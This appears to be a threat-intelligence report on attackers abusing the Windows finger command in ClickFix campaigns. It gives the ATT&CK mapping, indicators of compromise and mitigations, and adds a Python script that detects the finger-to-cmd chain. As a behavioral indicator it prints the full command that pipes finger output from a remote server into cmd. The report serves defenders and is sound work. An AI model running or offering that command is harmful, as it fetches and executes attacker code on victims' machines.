Full Report
The decades-old "finger" command is making a comeback, with threat actors using the protocol to retrieve remote commands to execute on Windows devices. [...]
Analysis Summary
# Tool/Technique: Abuse of the Finger Protocol for Command Execution
## Overview
Threat actors are abusing the decades-old Finger protocol (typically running on TCP port 79) to retrieve remote commands and execute them directly on compromised Windows devices. This technique is being utilized in campaigns disguised as "ClickFix" prompts, tricking users into running commands that fetch and execute secondary payloads.
## Technical Details
- Type: Technique (Protocol Abuse/LOLBIN use)
- Platform: Windows
- Capabilities: Remote command retrieval, execution of retrieved commands via `cmd.exe`, download and execution of secondary malware stages (including infostealers and RATs).
- First Seen: Mentioned in 2020 context; demonstrated in recent ClickFix campaigns.
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1218 - System Binary Proxy Execution
- T1218.011 - Signed Binary Proxy Execution: System Utilities (While not strictly a signed binary, the use of a legitimate, built-in command line utility for malicious purposes aligns with this category of abuse.)
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- T1071.004 - Application Layer Protocol: Non-C2 Protocol (Abusing Finger, a non-standard C2 protocol)
## Functionality
### Core Capabilities
- **Remote Command Retrieval:** Executing `finger user@<finger_server>` returns the Finger daemon's response (the attacker-supplied commands) to the local client as ordinary command output.
- **Local Execution:** The retrieved output is immediately piped (`|`) into `cmd.exe` for execution, effectively turning the legitimate command into a remote execution mechanism.
- **Payload Delivery:** Commands instruct the victim's system to download ZIP archives disguised as PDF files using `curl.exe` (or renamed copies of `curl.exe`).
### Advanced Features
- **Evasion:** Later variants check for the presence of common malware analysis/research tools (e.g., Procmon, Wireshark, debuggers like OllyDbg, IDA) and will exit if these are detected, indicating anti-analysis capabilities.
- **Multi-stage Payload:** Initial execution results in downloading and extracting a Python malware package (potentially an infostealer) or, in more evolved cases, deploying the NetSupport Manager RAT.
- **Persistence:** The RAT deployment includes configuring a scheduled task to ensure execution upon user login.
## Indicators of Compromise
- File Hashes:
- Batch file example (2020 context): `713d4846f83ef09befbb07f27e2f374b766b8aca4a5a1e937ba39b4dbe3c022d` (SHA256)
- Downloaded archive example (Python package): `032922e952f5f67582ad5a894920794f89b459c477499bd56e57c60f5559f6b4` (SHA256)
- File Names:
- Randomly named files, executables often copied from system utilities (e.g., renamed `curl.exe`).
- Extracted Python package structure: `__init__.py`
- Registry Keys:
- Configuration of a scheduled task (specific keys/names not detailed, but persistence mechanism noted).
- Network Indicators:
- Target user strings observed: `[email protected][.]com`
- Target user strings observed: `[email protected][.]org`
- Target user strings observed: `[email protected][.]com`
- Download domain observed: `cloudmega[.]org`
- Behavioral Indicators:
- Execution of `cmd /c start "" /min cmd /c "finger <user>@<server> | cmd"`
- Process creation involving `pythonw.exe` executing a malicious script.
- Outbound TCP connection attempts to port 79.
## Associated Threat Actors
- Associated with **ClickFix** social engineering campaigns.
- Likely a single threat actor group based on the current reporting, though the methods (using `finger`) have been warned about since 2020.
## Detection Methods
- Signature-based detection: Signatures for the known downloaded payloads (Python package, NetSupport Manager RAT).
- Behavioral detection: Monitoring for the execution chain involving the `finger` command piping output directly to `cmd.exe`.
- YARA rules if available: Not specifically mentioned for network traffic or system binaries, but YARA rules could target the extracted Python malware or NetSupport Manager configuration files.
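The behavioral detection above, as an added example that is not from the report: Python triage over constructed Sysmon-style process-creation and network events that flags the `finger ... | cmd` command line, `finger.exe` spawned by `cmd.exe`, and outbound TCP 79. The event field names and the `finger.example` host are assumptions.

```python
import re

# Constructed sample events in a Sysmon-like shape (not taken from the report):
# EventType, Id, Image, ParentImage, CommandLine / DestinationPort, Protocol, Initiated.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Id": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'cmd /c start "" /min cmd /c "finger alice@finger.example | cmd"'},
    {"EventType": "ProcessCreate", "Id": 2, "Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "finger alice@finger.example"},
    {"EventType": "NetworkConnect", "Id": 3, "Image": r"C:\Windows\System32\finger.exe",
     "Protocol": "tcp", "Initiated": True, "DestinationPort": 79},
    {"EventType": "ProcessCreate", "Id": 4, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd /c dir | findstr exe"},
    {"EventType": "NetworkConnect", "Id": 5, "Image": r"C:\Program Files\Browser\browser.exe",
     "Protocol": "tcp", "Initiated": True, "DestinationPort": 443},
]

# finger[.exe] <user>@<host> | cmd[.exe]; case-insensitive, tolerates missing spaces around the pipe
FINGER_PIPE_RE = re.compile(r"\bfinger(?:\.exe)?\s+\S+@\S+\s*\|\s*cmd(?:\.exe)?\b", re.IGNORECASE)

def is_finger_pipe_chain(cmdline: str) -> bool:
    """True when a command line runs finger user@host and pipes the output into cmd."""
    return bool(FINGER_PIPE_RE.search(cmdline))

def is_finger_child_of_cmd(event: dict) -> bool:
    """True when finger.exe is spawned by cmd.exe (the child half of the observed chain)."""
    return (event.get("Image", "").lower().endswith("finger.exe")
            and event.get("ParentImage", "").lower().endswith("cmd.exe"))

def is_outbound_finger(event: dict) -> bool:
    """True for an outbound TCP connection to port 79, whatever process initiated it."""
    return (event.get("Protocol", "").lower() == "tcp"
            and bool(event.get("Initiated"))
            and event.get("DestinationPort") == 79)

def triage(events):
    """Return (rule_name, event_id) pairs for every event that matches a detection."""
    hits = []
    for e in events:
        if e["EventType"] == "ProcessCreate":
            if is_finger_pipe_chain(e.get("CommandLine", "")):
                hits.append(("finger_piped_to_cmd", e["Id"]))
            if is_finger_child_of_cmd(e):
                hits.append(("finger_spawned_by_cmd", e["Id"]))
        elif e["EventType"] == "NetworkConnect" and is_outbound_finger(e):
            hits.append(("outbound_tcp_79", e["Id"]))
    return hits
```

On the sample set, `triage(SAMPLE_EVENTS)` returns one hit per rule for events 1, 2 and 3 and nothing for the benign pipe or the HTTPS connection.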
## Mitigation Strategies
- **Network Blocking:** Block all outgoing traffic to **TCP port 79** (Finger protocol) at the network perimeter or host firewall level.
- **Protocol Disabling:** Ensure the Finger service is disabled on internal Windows systems where it is not explicitly required.
- **User Awareness:** Educate users to be suspicious of unexpected prompts ("Verify you are human") requiring them to run commands in `Win+R` or Command Prompt.
## Related Tools/Techniques
- Abuse of other LOLBINs for remote command execution (e.g., PowerShell, certutil, bitsadmin, msiexec).
- Traditional C2 using common protocols (HTTP/S, DNS).
- NetSupport Manager RAT (deployed payload).